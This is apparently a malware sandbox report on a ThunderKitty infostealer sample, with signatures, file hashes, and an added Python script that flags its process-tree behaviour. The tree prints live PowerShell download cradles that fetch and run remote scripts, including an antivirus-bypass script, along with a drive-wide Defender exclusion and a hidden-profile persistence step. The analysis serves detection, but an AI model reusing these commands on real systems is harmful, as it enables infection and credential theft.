Analysis

  • max time kernel
    136s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/08/2024, 04:27

General

  • Target

    2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    6306c8b9dd7f426c94b26bfe3c8eea0a

  • SHA1

    f2677719e81f9aa8c893552605d077c6462867b8

  • SHA256

    9e3540f2a70e61ea94d7c79f7b18a242014647693e802d55b0beeca7eee2bcb9

  • SHA512

    34689c6c5740d3cb4a73c31b35c7caa0a212f95fc24beae4019a045e28334d8bcb82f9a71c5bb3b5ce147592a4dc9309aedfe82cb8e0221d24256c2809f5674d

  • SSDEEP

    196608:ZjVyhpZ9CKRxcoPqJvAcfYmqQoYiPi9S:Zkh3ZRxcoyJ4cfYmnT

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses a command-line utility to view the network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3112
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp" "c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\CSC32F7FA706BA342FC8B8A58409BEEC249.TMP"
          4⤵
          PID:1096
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" wlan show profiles
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:2640
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup administrators
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4388
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup administrators
          4⤵
          PID:2500
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:4776
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe" /all
        3⤵
        PID:1168
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" user
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user
          4⤵
          PID:2236
      • C:\Windows\system32\ipconfig.exe
        "C:\Windows\system32\ipconfig.exe" /displaydns
        3⤵
        • Gathers network information
        PID:4844
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1520
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup
          4⤵
          PID:1992
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
        3⤵
        PID:3236
      • C:\Windows\system32\NETSTAT.EXE
        "C:\Windows\system32\NETSTAT.EXE" -ano
        3⤵
        • System Network Connections Discovery
        • Gathers network information
        PID:3656
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
        3⤵
        PID:976
      • C:\Windows\system32\ipconfig.exe
        "C:\Windows\system32\ipconfig.exe" /all
        3⤵
        • Gathers network information
        PID:2792
      • C:\Windows\system32\ROUTE.EXE
        "C:\Windows\system32\ROUTE.EXE" print
        3⤵
        PID:5016
      • C:\Windows\system32\ARP.EXE
        "C:\Windows\system32\ARP.EXE" -a
        3⤵
        • Network Service Discovery
        PID:4740
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" wlan show profile
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:4304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4664
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB882.tmp" "c:\Users\Admin\AppData\Local\Temp\xrr40alp\CSCD9452996B36F4B7B99B5DEF928F07273.TMP"
          4⤵
          PID:4116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:516
    • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
      PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3420
    • C:\Windows\system32\cmd.exe
      cmd /c rundll32.exe user32.dll,SwapMouseButton
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Windows\system32\rundll32.exe
        rundll32.exe user32.dll,SwapMouseButton
        3⤵
        PID:4532
    • C:\Windows\system32\cmd.exe
      cmd.exe /c start facebook.com
      2⤵
      PID:2232
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
      2⤵
      • Views/modifies file attributes
      PID:3612
    • C:\Windows\system32\taskkill.exe
      taskkill /F /IM wallpaper32.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3232
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1600
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp" "c:\Users\Admin\AppData\Local\Temp\gtcvzijr\CSCB63CF249BEA34E0391207E6455539A8.TMP"
          4⤵
          PID:5100
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x360 0x408
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:940
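The process tree above is a compact template for detection: a PowerShell download cradle (iwr/DownloadString piped into iex, with -exec bypass) that fans out into a burst of built-in discovery commands, followed by a drive-wide Defender exclusion and an attrib +h +s on the user's PowerShell profile so that it re-runs on every new shell. The script below is an added example, not part of this report or of the ThunderKitty project: it runs simple rules over (PID, parent PID, command line) events constructed from the tree shown above (the csc.exe, cvtres.exe and net1.exe helpers are left out), correlates parent and child to raise alerts, and pulls the dropper URLs out as IOCs. Rule names and the recon threshold of three discovery children are assumptions chosen for the example.

```python
"""Triage rules run over the process tree in this report (added example).

EVENTS is constructed from the command lines shown in the tree above, as
(PID, parent PID, command line) tuples; it is not sandbox output. Rule names
and RECON_THRESHOLD are assumptions made for this example.
"""
import re
from collections import defaultdict

EVENTS = [
    (4908, 0, r'"C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe"'),
    (3112, 4908, r'''powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"'''),
    (2640, 3112, r'"C:\Windows\system32\netsh.exe" wlan show profiles'),
    (4388, 3112, r'"C:\Windows\system32\net.exe" localgroup administrators'),
    (4776, 3112, r'"C:\Windows\system32\netsh.exe" advfirewall show allprofiles'),
    (1168, 3112, r'"C:\Windows\system32\whoami.exe" /all'),
    (4844, 3112, r'"C:\Windows\system32\ipconfig.exe" /displaydns'),
    (3656, 3112, r'"C:\Windows\system32\NETSTAT.EXE" -ano'),
    (976, 3112, r'"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe'),
    (4740, 3112, r'"C:\Windows\system32\ARP.EXE" -a'),
    (540, 4908, r'''powershell -exec bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1')"'''),
    (516, 4908, r'''powershell -C "Add-MpPreference -ExclusionPath 'C:'"'''),
    (3612, 4908, r'attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1'),
    (2588, 4908, r'taskkill /F /IM wallpaper32.exe'),
    (3232, 4908, r'''powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"'''),
]

# Built-in tools the tree uses for host/network discovery (assumed list).
DISCOVERY_IMAGES = {"net", "net1", "netsh", "whoami", "ipconfig", "netstat", "wmic", "arp", "route"}
RECON_THRESHOLD = 3  # assumption: this many discovery children under one cradle is an alert
URL_RE = re.compile(r"https?://[^\s'\")]+")


def image_name(cmdline):
    """Return the lower-cased executable name without its path or .exe suffix."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        exe = cmdline[1:end] if end > 0 else cmdline[1:]
    else:
        exe = cmdline.split(None, 1)[0]
    name = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(cmdline):
    """Tag one command line with the behaviours seen in this report's tree."""
    tags = set()
    img = image_name(cmdline)
    low = cmdline.lower()
    if img in ("powershell", "pwsh"):
        # Download cradle: remote content evaluated in-memory via iex/Invoke-Expression.
        if (re.search(r"\b(iex|invoke-expression)\b", low)
                and re.search(r"downloadstring|downloadfile|\biwr\b|invoke-webrequest|net\.webclient", low)):
            tags.add("download_cradle")
        if re.search(r"-(exec|ep|executionpolicy)\s+bypass", low):
            tags.add("execution_policy_bypass")
        if re.search(r"add-mppreference\b.*-exclusion(path|process|extension)", low):
            tags.add("defender_exclusion")
            m = re.search(r"-exclusionpath\s+['\"]?([^'\"\s]+)", low)
            # 'C:' or 'C:\' excludes the whole volume, which neuters Defender in practice.
            if m and re.fullmatch(r"[a-z]:\\?", m.group(1)):
                tags.add("drive_wide_exclusion")
    if img == "attrib" and "+h" in low and "profile.ps1" in low:
        tags.add("profile_hidden")  # hidden PowerShell profile: runs on every new shell
    if img in DISCOVERY_IMAGES:
        tags.add("discovery")
        if img == "netsh" and "wlan show profile" in low:
            tags.add("wifi_profile_discovery")
        if img == "wmic" and "securitycenter2" in low:
            tags.add("av_discovery")
    if img == "taskkill" and "/f" in low:
        tags.add("process_kill")
    return tags


def extract_urls(cmdline):
    return URL_RE.findall(cmdline)


def triage(events):
    """Classify every event, then correlate parent and child PIDs to raise alerts."""
    findings, children = {}, defaultdict(list)
    for pid, ppid, cmd in events:
        tags = classify(cmd)
        if tags:
            findings[pid] = sorted(tags)
        children[ppid].append(pid)
    alerts = []
    for pid, _, _ in events:
        tags = findings.get(pid, [])
        if "download_cradle" in tags:
            recon = [c for c in children[pid] if "discovery" in findings.get(c, [])]
            if len(recon) >= RECON_THRESHOLD:
                alerts.append(f"pid {pid}: download cradle spawned {len(recon)} discovery commands")
        if "drive_wide_exclusion" in tags:
            alerts.append(f"pid {pid}: Defender exclusion covers an entire drive")
        if "profile_hidden" in tags:
            alerts.append(f"pid {pid}: PowerShell profile hidden with attrib (persistence)")
    iocs = sorted({u for _, _, cmd in events for u in extract_urls(cmd)})
    return {"findings": findings, "alerts": alerts, "iocs": iocs}


if __name__ == "__main__":
    result = triage(EVENTS)
    for line in result["alerts"]:
        print("ALERT", line)
    for url in result["iocs"]:
        print("IOC", url)
```

On the sample tree this yields three alerts (the recon burst under PID 3112, the drive-wide exclusion from PID 516, and the hidden profile from PID 3612) and the three raw.githubusercontent.com dropper URLs as IOCs. The correlation step is the point: any one of `netsh wlan show profiles` or `whoami /all` is noise on its own, but eight of them under a process that just evaluated remote code is not, and the profile tampering is what survives a reboot, so it is worth its own alert even though the sandbox only tags it as "Views/modifies file attributes".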

Network

MITRE ATT&CK Enterprise v15

Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            360B

                            MD5

                            42a3e507d48a9cb6215ca9938eab61eb

                            SHA1

                            58c18dbd1b4fc1f724093100eebb2b1deba3c42f

                            SHA256

                            7f80bfda515b23fe7c4d67bb7c8513fa8a41bd070f09fd587f1be757a12c1cc2

                            SHA512

                            97ac52563a533a781fc333f1304d5ace76101266ade0b50f6a83e469dc1f2a594fe5c7de317d805d753f18d1263f4dc1f4c9e8dc195a1fce27b75eff87c8aefd

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            cb773d3cb42a8e42796e4777c3b9b3f6

                            SHA1

                            fb55d9b2b33bc0ec2d3412e91c36cb9af69bc90f

                            SHA256

                            3297a9790da3a9dc73c2465e427fc8a3dda387e787f301d2a4b5f99fa8a13da3

                            SHA512

                            b70b769caed999941cc5fdf0b6caaffc9dfe2d8a9afb10d90fec6f016e7ad4362d59ef4c28d2dd870e68f1be6fe1f39ee14ebbdd6427c729873a215846ac61a2

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            1KB

                            MD5

                            b66db53846de4860ca72a3e59b38c544

                            SHA1

                            2202dc88e9cddea92df4f4e8d83930efd98c9c5a

                            SHA256

                            b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

                            SHA512

                            72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

                          • C:\Users\Admin\AppData\Local\Temp\RESB882.tmp

                            Filesize

                            1KB

                            MD5

                            3dfefaa550483a2eb83162c9403f5bed

                            SHA1

                            be4c72f5068441e1262f97a4c5ff1de13aeff648

                            SHA256

                            7487913514749dc14e4af1b1784199e736982eda0f30a8e1ffccd36a9515fc0e

                            SHA512

                            2f3ec45b6ae9f209b0c713e8bca4ee5025cc8d43125cc13b1f17dcd3653485a626c44a1d6331a9a14d2fa386b508809a45b73f8b68fbef4a01f52b5213cbac43

                          • C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp

                            Filesize

                            1KB

                            MD5

                            212dc419f675b7c890721990c23105cc

                            SHA1

                            39d40e6f76ed80e68207b4c0ff0849082deaafcf

                            SHA256

                            5a4948c7ad5dfce7d90515d0a4138f6910ca28f37251e3665de24d2cfca926dd

                            SHA512

                            016d1a8819c4c727901ed305219a657d6c196f6735e9f31d3a64b87dcfec812fc573b1537143c6971b3e478eba97e9806d489ad9dd4befbc0e012797320cd0c9

                          • C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp

                            Filesize

                            1KB

                            MD5

                            8518407243ef149d630ad0999189f1f0

                            SHA1

                            745265b6b0e8a8efdec34e73bbd1451554c6e566

                            SHA256

                            a2e924f753b40e592ac9c2b9dfada88aecffb51803c6901c5cff50a187d5a45e

                            SHA512

                            88b52df812828c1591b24ebb0d87909d7ee248f96cdeac91e1d3b337bb2ab52e32d986ae733000d7f63a356ca3269d26b5d55548f6d73e13b8bd952927b70a18

                          • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                            Filesize

                            72KB

                            MD5

                            9a2d58c3604cb1a996f9bba9837c6840

                            SHA1

                            5cac465afa69b4ef49a5b9693307691984e0a4cd

                            SHA256

                            b576a37cfb34d710c438bfb69d4ed8855d460546adddd25921b46f3672e1a74a

                            SHA512

                            d518d89c147380476ed39bf371bef552f5bd5d691a4b10c25da5d0ea8b5195601ee34f038bdb69872f86f328e426dc0144614ad4d461d72cb946fc47ac6f76e1

                          • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                            Filesize

                            24KB

                            MD5

                            8a29e641e8f0a156c169605af78221ad

                            SHA1

                            e09539b9552ecb8e5c20e8dc86334dfc8a38f9e4

                            SHA256

                            9a226f8846bf8cdd52f1fac2d05bbb7e8e4c1e14572f51530b0709de52221c77

                            SHA512

                            570f54233901b413588119ebfbe8809984a3fb2ef9a39ede4986c683c5b6bab6876a0c97cdcd2e010c64fc6c1943148b0551ccd0ba1536fb00ae453162c93136

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsqbigeo.lab.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.dll

                            Filesize

                            4KB

                            MD5

                            4b8a293f6f69dcc4ba7bd483f8ddd3c4

                            SHA1

                            e11ed93e925ca07233a4a6591fe4f29232593e2e

                            SHA256

                            a28454ce25ee4445329c10fa67a83e0944862812c6ecec1015612a8a737e289e

                            SHA512

                            f60d12dc9376a33329f31f30d6cd88d9972cce35620689f10735f8b2e7a188b76d32236dd88e72709e9276ee8e2b05d1923af07112f0f3729445b1b2e63a0402

                          • C:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.dll

                            Filesize

                            4KB

                            MD5

                            38e2dbaf8ea97886466086a02aaf2fe3

                            SHA1

                            a6bebdb7ab24e76a4886d7053a02b4e254b100f4

                            SHA256

                            022a4bb2ac8537b3fb17008c94fe45af7b60f1caeee0fbf69638bd88bf605f5f

                            SHA512

                            fb750397f117f82499ca8fd914aaaaa320dde2fc96994d4081e87a345b04ee075e9a08fdd010dd45643d8967d4f7428f8c5acdb19903194e9b2940bc9a85d40f

                          • C:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.dll

                            Filesize

                            4KB

                            MD5

                            dc0833b381e34e08e6ce0781d5d1d915

                            SHA1

                            22ad273c945616919f64633e3148c7d4cc41c343

                            SHA256

                            ec44e8eb6af714a72d2e870bb2be428125b986e4b176c6dbb6634c0941befad1

                            SHA512

                            eba0aa675da7bd99ee65889736cc2d7e2f6e981cf3861b0ce86a465c06cb42589d33ababe2c8d546c2c78472e764913c0cc6e291173fd6b044508cb5d3a046bd

                          • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                            Filesize

                            2KB

                            MD5

                            9758656bbe8589c66bb241b052490c72

                            SHA1

                            b73da83fb3ae6b86c6365769a04de9845d5c602c

                            SHA256

                            e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                            SHA512

                            da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                          • \??\c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\CSC32F7FA706BA342FC8B8A58409BEEC249.TMP

                            Filesize

                            652B

                            MD5

                            0603d7c3aa7b09780367c8424256509c

                            SHA1

                            741dd50c347703a237bb7fdec23cf88773be7ae2

                            SHA256

                            e9e9da29a7600a8bc8e87a1285ce6d79bf3462dbf3afc7bf8ad3d8f28164a8c3

                            SHA512

                            47eab6f5bd048fd6860184405f40d0b91f6c37d87cbf0becce8f3ffef06392d4414d19e2c079142010f1888ead0a38b5e8d5513453a9c46e9dded2bc42cbd202

                          • \??\c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.cmdline

                            Filesize

                            369B

                            MD5

                            156c3f0e87cae2243a3acadb43e7a953

                            SHA1

                            7b37ddef654fc06871f849ddea9454459fc924f6

                            SHA256

                            aab4e17cd43f7fe7df118765f4c19171e20b551318f68b3be31ad3e562805745

                            SHA512

                            e0abe4af71c6ddad14122f3e3a1132a176d91eedf86019dcb863968547c730893206c19c0e340b58048fae27a9d9c25ef0614dd7f0b1d29cf1091f4c2562d036

                          • \??\c:\Users\Admin\AppData\Local\Temp\gtcvzijr\CSCB63CF249BEA34E0391207E6455539A8.TMP

                            Filesize

                            652B

                            MD5

                            138fef6a49040c20aa2e3f987bac40a8

                            SHA1

                            65b48329b6da7ad8b48211e7d5003a66b1bd1572

                            SHA256

                            28c45d6ae400a84c76295cde4fb6990a2003f3fc6f7424603e37b83edd087bd2

                            SHA512

                            573efb53f867c44963f495252d509c5e0c5a47e1ead395bd0845700f7d711799581a2f62821b1192d0e10e092d08106c1f4081cf12e985d9beff1681121c2e22

                          • \??\c:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.cmdline

                            Filesize

                            369B

                            MD5

                            f4ec44b1e0416522e893656f4211dd85

                            SHA1

                            21fa73d2c47c8873bb7d36ee92da430ec8932692

                            SHA256

                            33740df0d38fae04117de2d0c2674ffdd4514d1f1d2cc758936d5aba324aeb19

                            SHA512

                            9bcca84082919838c7b17fde5df8b85349d055efbbc40ba14b5f39c833f38f9883d52427ad2107a81a8dda7f6456be72b4f8ae6307697548cb203e6b6669be87

                          • \??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\CSCD9452996B36F4B7B99B5DEF928F07273.TMP

                            Filesize

                            652B

                            MD5

                            03aa63ac01dcc0d4064dcb739854c5eb

                            SHA1

                            1249475a980712e0ecea2835ca705fd815b5c0c3

                            SHA256

                            ce618cb9a317a0677667cc08ec1a4d02f033fe26bb7ef0314b30153ee0ee9e29

                            SHA512

                            2c6183995c61a727ef571dc5c5403270c7fc4ba2d12a46fcc9ae35806b8a106ad6c7a04652a0692506f1cae8e7a54bbbdbeff6f82db02d1152a9c6da4cd50825

                          • \??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.0.cs

                            Filesize

                            1KB

                            MD5

                            8a1e7edb2117ec5dde9a07016905923b

                            SHA1

                            0155dbeeb16333e2eaa767b0209750efee56f47f

                            SHA256

                            c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                            SHA512

                            4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                          • \??\c:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.cmdline

                            Filesize

                            369B

                            MD5

                            901529e410f56056b087c902be3e28b4

                            SHA1

                            983d24144434a734ffd3da1f1a8fe326fee4d7ad

                            SHA256

                            6ad490659f82e8a4539dee23220bbbc1c2a27903853a4a6863170db4d3fdeec3

                            SHA512

                            f8214328f29e404e1ad6d327a345a5b5f2784bcb58612d5b6d39abef7fe42e6d2cd750696c4ea338a36f05a8a3aa1e3a95235384f8e5a09d280a8a5a32fe1e33

                          • memory/516-35-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/516-83-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/516-32-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/516-34-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/540-96-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/540-0-0x00007FFE8FA03000-0x00007FFE8FA05000-memory.dmp

                            Filesize

                            8KB

                          • memory/540-81-0x000001D8D4300000-0x000001D8D4308000-memory.dmp

                            Filesize

                            32KB

                          • memory/540-21-0x000001D8D4310000-0x000001D8D4332000-memory.dmp

                            Filesize

                            136KB

                          • memory/540-11-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/540-1-0x00007FFE8FA00000-0x00007FFE904C1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3112-98-0x000002572B0F0000-0x000002572B114000-memory.dmp

                            Filesize

                            144KB

                          • memory/3112-97-0x000002572B0F0000-0x000002572B11A000-memory.dmp

